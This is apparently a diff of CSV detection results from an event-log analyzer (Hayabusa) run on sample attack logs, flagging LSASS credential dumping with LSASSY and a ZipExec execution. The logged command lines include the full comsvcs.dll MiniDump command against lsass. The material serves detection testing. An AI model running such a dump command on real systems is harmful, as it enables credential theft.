+2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.523 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
